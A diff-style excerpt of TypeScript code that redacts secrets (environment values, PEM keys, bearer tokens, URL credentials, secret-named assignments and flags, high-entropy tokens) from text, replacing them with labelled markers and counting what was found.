* Redact every secret in `text`, replacing each with a `<redacted:label>`
|
|
2714
|
-
* marker and counting them.
|
|
2715
|
-
*
|
|
2716
|
-
* Rules run from the most exact to the most heuristic, so the most specific
|
|
2717
|
-
* label wins and later rules never re-match an earlier marker (a value that
|
|
2718
|
-
* starts with `<` is never a literal).
|
|
2719
|
-
*/
|
|
2720
|
-
export function redactSecrets(text: string, opts: RedactOptions = {}): Redacted {
|
|
2721
|
-
const { text: out, count } = redactSecretsDetailed(text, opts);
|
|
2722
|
-
return { text: out, count };
|
|
2723
|
-
}
|
|
2724
|
-
|
|
2725
|
-
/** `redactSecrets`, plus the literal secrets it replaced. */
|
|
2726
|
-
export function redactSecretsDetailed(text: string, opts: RedactOptions = {}): RedactedDetail {
|
|
2727
|
-
if (!text) return { text, count: 0, found: [], weak: [] };
|
|
2728
|
-
const blunt = opts.blunt === true;
|
|
2729
|
-
const c: Counter = { n: 0, found: [], weak: [] };
|
|
2730
|
-
let out = text;
|
|
2731
|
-
|
|
2732
|
-
// 1. Exact values of this machine's secret-named environment variables.
|
|
2733
|
-
for (const [value, name] of envSecrets()) {
|
|
2734
|
-
if (!out.includes(value)) continue;
|
|
2735
|
-
const parts = out.split(value);
|
|
2736
|
-
c.n += parts.length - 1;
|
|
2737
|
-
c.found.push(value);
|
|
2738
|
-
out = parts.join(marker(`value of $${name}`));
|
|
2739
|
-
}
|
|
2740
|
-
|
|
2741
|
-
// 2. Whole PEM blocks, before the shared rule eats just the header; then
|
|
2742
|
-
// the lines in front of a footer whose header was cut away.
|
|
2743
|
-
out = redactPemBlocks(out, c);
|
|
2744
|
-
out = redactOrphanFooters(out, c);
|
|
2745
|
-
|
|
2746
|
-
// 3. The shared floor.
|
|
2747
|
-
for (const [re, label] of SHARED_RULES) {
|
|
2748
|
-
const before = c.found.length;
|
|
2749
|
-
out = replaceCounting(out, re, () => marker(label), c);
|
|
2750
|
-
// A floor entry that takes the header NAME along with the value —
|
|
2751
|
-
// `Authorization: Bearer <tok>` is one match — reports the whole match as
|
|
2752
|
-
// the secret, and that string matches no copy of the credential anywhere
|
|
2753
|
-
// else in the envelope, so the copy the human pasted went out. Report the
|
|
2754
|
-
// credential inside it too, under the same rule as every other region.
|
|
2755
|
-
const end = c.found.length;
|
|
2756
|
-
for (let i = before; i < end; i++) {
|
|
2757
|
-
if (!/\s/.test(c.found[i])) continue;
|
|
2758
|
-
const copies = credentialCopies(c.found[i], true);
|
|
2759
|
-
for (const copy of copies.secrets) if (!c.found.includes(copy)) c.found.push(copy);
|
|
2760
|
-
for (const copy of copies.weak) if (!c.weak.includes(copy)) c.weak.push(copy);
|
|
2761
|
-
}
|
|
2762
|
-
}
|
|
2763
|
-
|
|
2764
|
-
// 4. Vendor prefixes and webhook URLs.
|
|
2765
|
-
for (const [re, label] of VENDOR_RULES) {
|
|
2766
|
-
out = replaceCounting(out, re, (_m, _g, offset, whole) => (atTokenBoundary(whole, offset) ? marker(label) : null), c, "skip");
|
|
2767
|
-
}
|
|
2768
|
-
for (const [re, label] of WEBHOOK_RULES) out = replaceCounting(out, re, (_m, g) => g[0] + marker(label), c);
|
|
2769
|
-
|
|
2770
|
-
// 5. Credentials in URLs and HTTP auth.
|
|
2771
|
-
// Both URL rules need a `://` to match at all, and the check is one pass
|
|
2772
|
-
// against two scans of every string the envelope sends.
|
|
2773
|
-
if (out.includes("://")) {
|
|
2774
|
-
out = replaceCounting(
|
|
2775
|
-
out,
|
|
2776
|
-
URL_CREDENTIALS_RE,
|
|
2777
|
-
(_m, g) => (isLiteral(g[3]) ? `${g[0]}${g[1]}${g[2]}:${marker("URL credentials")}@` : null),
|
|
2778
|
-
c,
|
|
2779
|
-
);
|
|
2780
|
-
out = replaceCounting(out, URL_TOKEN_USERINFO_RE, (_m, g) => (tokenLike(g[2]) ? `${g[0]}${g[1]}${marker("URL credentials")}@` : null), c);
|
|
2781
|
-
}
|
|
2782
|
-
if (blunt) out = redactCredentialHeaders(out, c);
|
|
2783
|
-
out = replaceCounting(
|
|
2784
|
-
out,
|
|
2785
|
-
BEARER_RE,
|
|
2786
|
-
// A compound id (`dev-admin-key`) counts too: prose puts a word after
|
|
2787
|
-
// "bearer", not a hyphenated identifier — except `token-based` and kin.
|
|
2788
|
-
(_m, g) =>
|
|
2789
|
-
tokenLike(g[1]) || (/^[a-z0-9]+(?:[-_][a-z0-9]+)+$/.test(g[1]) && !/^tokens?[-_]/.test(g[1]))
|
|
2790
|
-
? `${g[0]}${marker("bearer token")}`
|
|
2791
|
-
: null,
|
|
2792
|
-
c,
|
|
2793
|
-
);
|
|
2794
|
-
|
|
2795
|
-
// 6. Credentials passed positionally, or behind a flag that names one.
|
|
2796
|
-
// The quotes around a value are re-emitted around the marker rather than
|
|
2797
|
-
// dropped with it: the replaced command stays quoted as it was written, and
|
|
2798
|
-
// the secret these rules hand to the scrub pass is the BARE value, which is
|
|
2799
|
-
// the form its copies elsewhere in the envelope are in.
|
|
2800
|
-
if (blunt) out = redactCredentialArguments(out, c);
|
|
2801
|
-
|
|
2802
|
-
out = redactNamedSecrets(out, c);
|
|
2803
|
-
|
|
2804
|
-
// 8. Anything left that looks generated.
|
|
2805
|
-
out = replaceCounting(
|
|
2806
|
-
out,
|
|
2807
|
-
LONG_TOKEN_RE,
|
|
2808
|
-
(m, _g, offset, whole) => (looksRandomToken(m) && !insideDigest(whole, offset) ? marker("high-entropy token") : null),
|
|
2809
|
-
c,
|
|
2810
|
-
"skip",
|
|
2811
|
-
);
|
|
2812
|
-
|
|
2813
|
-
return { text: out, count: c.n, found: c.found, weak: c.weak };
|
|
2814
|
-
}
|
|
2815
|
-
|
|
2816
|
-
/**
|
|
2817
|
-
* The three name-driven scans: `config set <name> <value>`, every syntax of
|
|
2818
|
-
* `NAME=value`, and `--flag value`.
|
|
2819
|
-
*
|
|
2820
|
-
* Skipped whole for a string that holds no secret-name word, which is one pass
|
|
2821
|
-
* against three (see `SECRET_NAME_HINTS`). The two name-and-value scans walk
|
|
2822
|
-
* their value in code, so a delimiter-free run costs its length and not its
|
|
2823
|
-
* square.
|
|
2824
|
-
*/
|
|
2825
|
-
function redactNamedSecrets(text: string, c: Counter): string {
|
|
2826
|
-
if (!mayHoldSecretName(text)) return text;
|
|
2827
|
-
let out = text;
|
|
2828
|
-
out = replaceCounting(
|
|
2829
|
-
out,
|
|
2830
|
-
CONFIG_SET_RE,
|
|
2831
|
-
// The NAME decides, as it does for a credential flag: `aws configure set
|
|
2832
|
-
// aws_secret_access_key swordfish` is a credential although nothing about
|
|
2833
|
-
// the value says so. Only a value already replaced is left alone.
|
|
2834
|
-
(_m, g) => {
|
|
2835
|
-
const [quote, value] = unquote(g[3]);
|
|
2836
|
-
return secretNameStrength(g[1]) !== null && withoutMarkers(value).trim() !== ""
|
|
2837
|
-
? `${g[0]}${g[1]}${g[2]}${quote}${marker("assigned secret")}${quote}`
|
|
2838
|
-
: null;
|
|
2839
|
-
},
|
|
2840
|
-
c,
|
|
2841
|
-
);
|
|
2842
|
-
|
|
2843
|
-
// 7. Assignments whose name says the value is a secret, and secret-named
|
|
2844
|
-
// flags with a separate value. Both walk the value in code.
|
|
2845
|
-
out = redactNameValue(out, ASSIGNMENT_NAME_RE, c, (text, m, value) => {
|
|
2846
|
-
const [, boundary, , name, , sep] = m;
|
|
2847
|
-
// `${NAME:-default}` / `${NAME:=default}`: the default is the value, and a
|
|
2848
|
-
// default that is itself `$OTHER` is a reference, not a literal.
|
|
2849
|
-
const dollarBrace = boundary === "{" && m.index > 0 && text[m.index - 1] === "$" && sep === ":";
|
|
2850
|
-
const quoted = value.quote !== "";
|
|
2851
|
-
const v = !quoted && dollarBrace ? value.text.replace(/^[-=+?]/, "") : value.text;
|
|
2852
|
-
const urlQuery = boundary === "?" || boundary === "&";
|
|
2853
|
-
const colon = sep.trim() === ":";
|
|
2854
|
-
return assignmentValueIsSecret(name, v, { quoted, spaced: colon || /\s/.test(sep), urlQuery, colon });
|
|
2855
|
-
});
|
|
2856
|
-
// The boundary group rules out `x--token` and the `-b` of `a-b c`.
|
|
2857
|
-
out = redactNameValue(out, FLAG_NAME_RE, c, (_text, m, value) =>
|
|
2858
|
-
assignmentValueIsSecret(m[2], value.text, { quoted: value.quote !== "", spaced: true, urlQuery: false, flag: true }),
|
|
2859
|
-
);
|
|
2860
|
-
return out;
|
|
2861
|
-
}
|
|
2862
|
-
|
|
2863
|
-
/**
|
|
2864
|
-
* One scan of `re` — a NAME and its separator — with the value that follows
|
|
2865
|
-
* walked in code and replaced when `isSecret` says so.
|
|
2866
|
-
*
|
|
2867
|
-
* Linear in the length of the text whatever it holds: each match is O(1) after
|
|
2868
|
-
* the boundary group, and `literalValue`'s cursor visits each character of a
|
|
2869
|
-
* value about once.
|
|
2870
|
-
*
|
|
2871
|
-
* A DECLINED match gives back all but its first character, as the old
|
|
2872
|
-
* `replaceCounting` did, because a candidate can start INSIDE one: in
|
|
2873
|
-
* `let parsed: FileCredentials = …` the first match is `parsed:` and the
|
|
2874
|
-
* secret-named assignment begins in the middle of what it consumed. Resuming
|
|
2875
|
-
* after the separator instead lost it. Only the name and the separator are
|
|
2876
|
-
* given back — never a value — so the give-back is bounded by the name, and
|
|
2877
|
-
* the names it walks again are disjoint.
|
|
2878
|
-
*/
|
|
2879
|
-
function redactNameValue(
|
|
2880
|
-
text: string,
|
|
2881
|
-
re: RegExp,
|
|
2882
|
-
c: Counter,
|
|
2883
|
-
isSecret: (text: string, m: RegExpExecArray, value: { quote: string; text: string }) => boolean,
|
|
2884
|
-
): string {
|
|
2885
|
-
const escapedQuote = re === ASSIGNMENT_NAME_RE;
|
|
2886
|
-
const stop = { from: 0, at: -1 };
|
|
2887
|
-
let out = "";
|
|
2888
|
-
let last = 0;
|
|
2889
|
-
re.lastIndex = 0;
|
|
2890
|
-
for (let m = re.exec(text); m !== null; m = re.exec(text)) {
|
|
2891
|
-
if (m.index < last) {
|
|
2892
|
-
re.lastIndex = Math.max(re.lastIndex, last);
|
|
2893
|
-
continue;
|
|
2894
|
-
}
|
|
2895
|
-
const at = m.index + m[0].length;
|
|
2896
|
-
const v = literalValue(text, at, { escapedQuote, leadingDash: escapedQuote, stop });
|
|
2897
|
-
if (v === null || !isSecret(text, m, { quote: v.quote, text: text.slice(v.from, v.to) })) {
|
|
2898
|
-
re.lastIndex = m.index + 1;
|
|
2899
|
-
continue;
|
|
2900
|
-
}
|
|
2901
|
-
const value = text.slice(v.from, v.to);
|
|
2902
|
-
out += text.slice(last, v.from) + marker("assigned secret");
|
|
2903
|
-
c.n++;
|
|
2904
|
-
c.found.push(value);
|
|
2905
|
-
last = v.to;
|
|
2906
|
-
re.lastIndex = v.to;
|
|
2907
|
-
}
|
|
2908
|
-
re.lastIndex = 0;
|
|
2909
|
-
return last === 0 ? text : out + text.slice(last);
|
|
2910
|
-
}
|